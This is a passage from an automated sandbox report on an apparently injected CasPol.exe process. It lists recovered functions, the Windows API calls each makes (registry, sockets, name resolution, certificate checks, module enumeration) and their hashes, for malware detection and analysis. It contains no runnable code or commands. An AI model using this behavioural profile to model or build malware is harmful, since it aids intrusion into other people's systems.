                                  • Instruction Fuzzy Hash: 55417B6640E3C05FD71387358C65AA1BFB4AF47610F0E81DBD9C4CF5A3D2285909C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E07EA Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 010E08A9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 6a5d7bd77a991f9f0a12925e5500c9682dea404bd8ce40b42bf5898f1b412dde
                                  • Instruction ID: 4ac7f41da0bb9dd33c698c0f6c895791e40c17394580150ad8e33e49b041d121
                                  • Opcode Fuzzy Hash: 6a5d7bd77a991f9f0a12925e5500c9682dea404bd8ce40b42bf5898f1b412dde
                                  • Instruction Fuzzy Hash: 1E316071504380AFE722CB25DD45B62BFE8EF46310F08849AE9848B253D275A509DB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E27D3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EA4), ref: 010E28AB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: 837677489a413c71ab9ce996085a1791e6450e1210409ef3eee5d6140cfa23ae
                                  • Instruction ID: 33cde75fa5bbd91b149b6dec3a50a76ae71f2f6126b5b749ec54b08a5048b6e0
                                  • Opcode Fuzzy Hash: 837677489a413c71ab9ce996085a1791e6450e1210409ef3eee5d6140cfa23ae
                                  • Instruction Fuzzy Hash: 3C31C3B1504344AFF7228B61DC84FA6BBECEF06310F04459AF9849F192D275A909CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1E8E Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E1F45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: ccfca811f8a2298f1c40681569e7b838f7cbbbdc2d9132331c009b49242d8358
                                  • Instruction ID: 9bc201d376c159e0cb952540142b10ee806466977c863453c2bd802f8b4d76b0
                                  • Opcode Fuzzy Hash: ccfca811f8a2298f1c40681569e7b838f7cbbbdc2d9132331c009b49242d8358
                                  • Instruction Fuzzy Hash: 9D31C1B2404344AFE7228B25DC85FA6BBECEF55310F04899AF9849B142D374A509C7B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0D04 Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 010E0DB6
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: 5ad31233f0fc8d9cced1b45417b907d45371d3a7281f0354f95f059b80a1831f
                                  • Instruction ID: dae7a5d02ca447a94ba9839c7937fde0be52e15ce84137f4358675ba981b4847
                                  • Opcode Fuzzy Hash: 5ad31233f0fc8d9cced1b45417b907d45371d3a7281f0354f95f059b80a1831f
                                  • Instruction Fuzzy Hash: B63192715093C0AFE7238B65DC45B56BFF4EF06210F0984DBE9C58F1A3C266A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1B0B Relevance: 1.6, APIs: 1, Instructions: 93encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 010E1BCE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChain
                                  • String ID:
                                  • API String ID: 3019455780-0
                                  • Opcode ID: 171a37d6837b5f45044f8cf946afb39b1149371febacf4335627e00d6e761b1b
                                  • Instruction ID: 6de72baf230f4c3a3e719b2b82268d1333b882ca1d32f28952845a55a60144ad
                                  • Opcode Fuzzy Hash: 171a37d6837b5f45044f8cf946afb39b1149371febacf4335627e00d6e761b1b
                                  • Instruction Fuzzy Hash: 2B316D7290D3C45FD7138B358C61B62BFB4EF47614F1A84CBD8848F1A3D225A919D7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4707 Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E47BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 663bddb70f19f34ae9952da45112a5bbd269007476e4aad571801d638bf52413
                                  • Instruction ID: ca903569265e81bb9ef8481e9de3977f57264a5f4130c5c9e8f80538d4295004
                                  • Opcode Fuzzy Hash: 663bddb70f19f34ae9952da45112a5bbd269007476e4aad571801d638bf52413
                                  • Instruction Fuzzy Hash: BB317072509380AFE722CB65DC84F92BFF8AF46310F08859AE985DB153D265A509CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1A0D Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAIoctl.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1AC1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Ioctl
                                  • String ID:
                                  • API String ID: 3041054344-0
                                  • Opcode ID: 0a8c94b65df88f662b1783842b35e5230c8a4454e457678ffc10344e3c98be15
                                  • Instruction ID: e1ad19f54f9555fac9381f3f52106046b72f74550f985be02caff7e65a688564
                                  • Opcode Fuzzy Hash: 0a8c94b65df88f662b1783842b35e5230c8a4454e457678ffc10344e3c98be15
                                  • Instruction Fuzzy Hash: 64319271508780AFE722CF15DC84F62FFF8EF06310F08859AE9848B162D375A909DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E208E Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E213A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 755359369768a2ff5f6eb6c156b43115137c2e2d0a6907c321adb9605300aa51
                                  • Instruction ID: e1c8039fd134b5df4ae6ca4b449ba14f33849fe94d7b6d9f22deb80c7ba933e7
                                  • Opcode Fuzzy Hash: 755359369768a2ff5f6eb6c156b43115137c2e2d0a6907c321adb9605300aa51
                                  • Instruction Fuzzy Hash: C131E2B2808384AFE7228B25DC44F66FFB8EF16310F0884DAFD848B153D224A909C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA519 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D5FA5C9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 92ef87a7c4e125856d01e6e1219941c3fc25d93bc397ecf9f9383b90692600cc
                                  • Instruction ID: 54b431c63c34c895303cac3c7c1d2ec70336cec0069dafe4f5d7ac0e67008f1c
                                  • Opcode Fuzzy Hash: 92ef87a7c4e125856d01e6e1219941c3fc25d93bc397ecf9f9383b90692600cc
                                  • Instruction Fuzzy Hash: A9319572508784AFE7228B21DC85F67FFBCEF06210F08859BF985CB152D265A949C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA611 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FA6CC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 61c33289a27bd9a83020ca44cfacc3ac3953381806751e8b4f4ed0adc7ce7343
                                  • Instruction ID: 1c83155d53bdb8ceffce42266fe13fe4d2c423d64e3b1f090a1667951042c1c3
                                  • Opcode Fuzzy Hash: 61c33289a27bd9a83020ca44cfacc3ac3953381806751e8b4f4ed0adc7ce7343
                                  • Instruction Fuzzy Hash: D73193725097809FE722CB21CC85F67BFB8EF06214F18849AE985CB153D264E949CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FACEC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAD86
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: f2c09004aeb17b2d77fa5413a81c1c69b32db42adaedb05c75241944c8e8f97f
                                  • Instruction ID: f58b2b7585497cb77bc114ed90ddc0dfb7bc08e178e0a811ef2409b9054044bb
                                  • Opcode Fuzzy Hash: f2c09004aeb17b2d77fa5413a81c1c69b32db42adaedb05c75241944c8e8f97f
                                  • Instruction Fuzzy Hash: 2B31D5725097806FE712CF60DC85B56BFB8EF06320F08849AE984DF153C265A949C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E13C4 Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: d86014b47cd8478232c571b77f0a4a1a0717a25e3c53329c95bd6032b2321943
                                  • Instruction ID: f7b4ba90a32214d55c8312f0c3b5167da6d119e716f5cb002cd29494dc2998e3
                                  • Opcode Fuzzy Hash: d86014b47cd8478232c571b77f0a4a1a0717a25e3c53329c95bd6032b2321943
                                  • Instruction Fuzzy Hash: BC31C4B2404380AFE722CB15DC85F92FBF8EF06310F04859AE9848B252D375A949CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E102E Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E10D8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 1e07673adf1a3187479938d76dc9ac3b043f2772370376dfe3b586b9f2757a53
                                  • Instruction ID: 8b71335e81c437f47e01b09b25ee8a7584904f1a5c567695a8be96c0bde41ef4
                                  • Opcode Fuzzy Hash: 1e07673adf1a3187479938d76dc9ac3b043f2772370376dfe3b586b9f2757a53
                                  • Instruction Fuzzy Hash: 4A3181725097806FE722CB25DC44F92BFF8EF06210F0884DAE985CB153D265A949C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0C27 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  APIs
                                  • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 010E0CDA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionsEnum
                                  • String ID:
                                  • API String ID: 3832085198-0
                                  • Opcode ID: d5ce2ad0c9e95558d98d375fa0de17756318af63ac9568b97e900cf8a2ac35c9
                                  • Instruction ID: f4cb14973ae4c8e437bbafc2cd8429620db2c71bfb95c766661cade5fbf4cd15
                                  • Opcode Fuzzy Hash: d5ce2ad0c9e95558d98d375fa0de17756318af63ac9568b97e900cf8a2ac35c9
                                  • Instruction Fuzzy Hash: 62316F7250E3C05FD3138B358C65A61BFB4EF47610B0A81DFD884CF5A3D269A959CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4541 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 010E45F2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Enum
                                  • String ID:
                                  • API String ID: 2928410991-0
                                  • Opcode ID: c223b417d5dfc31fd18caafc81ae61f0e1379d53a06d8b5eb3acfb35d5dbc62f
                                  • Instruction ID: 7bdb917f8a2b0e3d01b618cfbff89ee7565963ebdde424fb5c649ff91b747fcb
                                  • Opcode Fuzzy Hash: c223b417d5dfc31fd18caafc81ae61f0e1379d53a06d8b5eb3acfb35d5dbc62f
                                  • Instruction Fuzzy Hash: 46315C6254E3C06FD3138B358C65A21BFB4EF87610B1D80CBD884CF1A3D229A919D7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1679 Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 010E1719
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: f24654302730aa31d80efd688c368b0145c0b41b78278025a53987306cac7261
                                  • Instruction ID: 79c044d52614dbb06c064fdc80cb9d968ac9eee248caa218b6b248169cd6c194
                                  • Opcode Fuzzy Hash: f24654302730aa31d80efd688c368b0145c0b41b78278025a53987306cac7261
                                  • Instruction Fuzzy Hash: 753182B1509380AFE712CB25DD89B56FFF8EF05610F08849AE984CF292D375E948CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E2806 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EA4), ref: 010E28AB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: b1b3d552a8f94c1550f9e48ef9d3e784f1e0e20cae82d0c347bd7778ece245a4
                                  • Instruction ID: 13a33adc8581fcf1f0dd82195d5b1182c35d052ad756b7c232ef915e5a0cb394
                                  • Opcode Fuzzy Hash: b1b3d552a8f94c1550f9e48ef9d3e784f1e0e20cae82d0c347bd7778ece245a4
                                  • Instruction Fuzzy Hash: B821E5B1900304AFFB21DB15DD85FA6F7ECEF04310F14489AFE889A181D6B5A5458B71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1F9A Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2044
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeNotifyValue
                                  • String ID:
                                  • API String ID: 3933585183-0
                                  • Opcode ID: 759d66d2d23a65896442ce086d3e7b9c78625acf6c18ddc7009cf7ba2ceb5f3a
                                  • Instruction ID: 473831b5a4b3a2d31c1522b028871341a0e5c64df48d2d74c8702cbe34c1c3b9
                                  • Opcode Fuzzy Hash: 759d66d2d23a65896442ce086d3e7b9c78625acf6c18ddc7009cf7ba2ceb5f3a
                                  • Instruction Fuzzy Hash: 1E31E372408380AFEB22CB10DC84F97FFF8EF46310F08899AE8849B153C265A509C7B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1DA0 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 010E1E39
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CurrentOpenUser
                                  • String ID:
                                  • API String ID: 1571386571-0
                                  • Opcode ID: 136e69f654ae8ab9bd136b0af74e2de4e8296fd2fdafa4591c0d008414d0ee99
                                  • Instruction ID: 732add6fe903b8fc5d26331f69be7f036229dc6fd4b208145e8dd22632387a2c
                                  • Opcode Fuzzy Hash: 136e69f654ae8ab9bd136b0af74e2de4e8296fd2fdafa4591c0d008414d0ee99
                                  • Instruction Fuzzy Hash: 5821A0B1409384AFE7228B25DC85F66FFB8EF46310F0884DBE9849F193D275A909C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E461E Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E46B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 167d62f0a635b153462a7c86d5915220ba354e357790be45beec09e2423cc411
                                  • Instruction ID: fb38e879d7ebafbb4d8420ddb134a1768b4dbca8e443dbcfb32fee84cc4d6307
                                  • Opcode Fuzzy Hash: 167d62f0a635b153462a7c86d5915220ba354e357790be45beec09e2423cc411
                                  • Instruction Fuzzy Hash: AE2191B2505340AFE7218B65DC89F66FFF8EF45220F08849AF984DB152D275A508CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FADE5 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAE76
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: f2b01cffd5190ea0409c59f8f248b66b5e6446da8d7643ecbd82ebeae285d1f6
                                  • Instruction ID: e40063ee3decfa7c9bd54c423732032e8d2b47fcc53f789aca11071b86a70c25
                                  • Opcode Fuzzy Hash: f2b01cffd5190ea0409c59f8f248b66b5e6446da8d7643ecbd82ebeae285d1f6
                                  • Instruction Fuzzy Hash: 2721A671509380AFE721CB11DC84F67FFB8EF46210F08849AE945DF152D269E909CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1770 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  • shutdown.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1804
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: shutdown
                                  • String ID:
                                  • API String ID: 2510479042-0
                                  • Opcode ID: 19241b3e51ebfed4a4430c869ec339cea9fabdfacf821777c3723067dbff1f3b
                                  • Instruction ID: 239763e111f964afb650774a9bd7cfae47f61109a91262659ebf8cac06e6baae
                                  • Opcode Fuzzy Hash: 19241b3e51ebfed4a4430c869ec339cea9fabdfacf821777c3723067dbff1f3b
                                  • Instruction Fuzzy Hash: 9621F9B1904780AFE7128B55DC85F96BFA8EF42720F0981DAE9849F193D2785905C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAEDC Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D5FAF82
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: 9fd56f75725082c30cffc1bdfe2aa021530db565abbb4a9a68d5b32c2239bb55
                                  • Instruction ID: 0eeabeac55e5ab2c9a14e48ab6197d86ac7f33377126d91934e121d6534e417a
                                  • Opcode Fuzzy Hash: 9fd56f75725082c30cffc1bdfe2aa021530db565abbb4a9a68d5b32c2239bb55
                                  • Instruction Fuzzy Hash: 9A21B4725093C06FD312CB65CC55B66BFB4EF47210F0984DBD8849F1A3D225A919C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4967 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                  Download Yara Rule
                                  APIs
                                  • getsockname.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E49F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 6736ecd14ec3af3047755e711ce10a673d7e63ece119f26c239fd5510b6db69f
                                  • Instruction ID: 8fa753cdb29ea5a13dcd8b273ff9ade44f3e69ca1b90ebf4281e8c853163817c
                                  • Opcode Fuzzy Hash: 6736ecd14ec3af3047755e711ce10a673d7e63ece119f26c239fd5510b6db69f
                                  • Instruction Fuzzy Hash: B0217F71508380AFE722CF25CC94F96BFF8EF46220F0884DAE984DF152D265A509CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1854 Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E18DD
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: 780b48d0f0bae81738e0f2d4af9935c593fef6a3d45befe64871e5414784223f
                                  • Instruction ID: 098a3fbf03b7f4ce9c8f9db82fd27247a8d58ee2b3e4e43709864a99e95d98cf
                                  • Opcode Fuzzy Hash: 780b48d0f0bae81738e0f2d4af9935c593fef6a3d45befe64871e5414784223f
                                  • Instruction Fuzzy Hash: 0221A472505740AFEB228F15DC85FA7FFF8EF46310F08849AE9859B162D275A409CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E3763 Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E37EA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  • Opcode ID: bffa168b34c9b9f8dbaae0c95c61180e17458da4c5741e70369b6a34a31375ad
                                  • Instruction ID: 34603acf8085b34f685cd697eef3a93a7d267a22447eadd9b90ac8b8a3dee5d5
                                  • Opcode Fuzzy Hash: bffa168b34c9b9f8dbaae0c95c61180e17458da4c5741e70369b6a34a31375ad
                                  • Instruction Fuzzy Hash: DC219271508380AFE722CB25DC85F66FFF8EF46210F08849AE9849F152C265A849CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1EC6 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E1F45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 01b52e1640523845408300282868cebce890abf20a0ad35005fa1528184ce2d9
                                  • Instruction ID: b1a1711049e69a5e2389f646e68e2fdf81f30c300aee485b48a214335606b278
                                  • Opcode Fuzzy Hash: 01b52e1640523845408300282868cebce890abf20a0ad35005fa1528184ce2d9
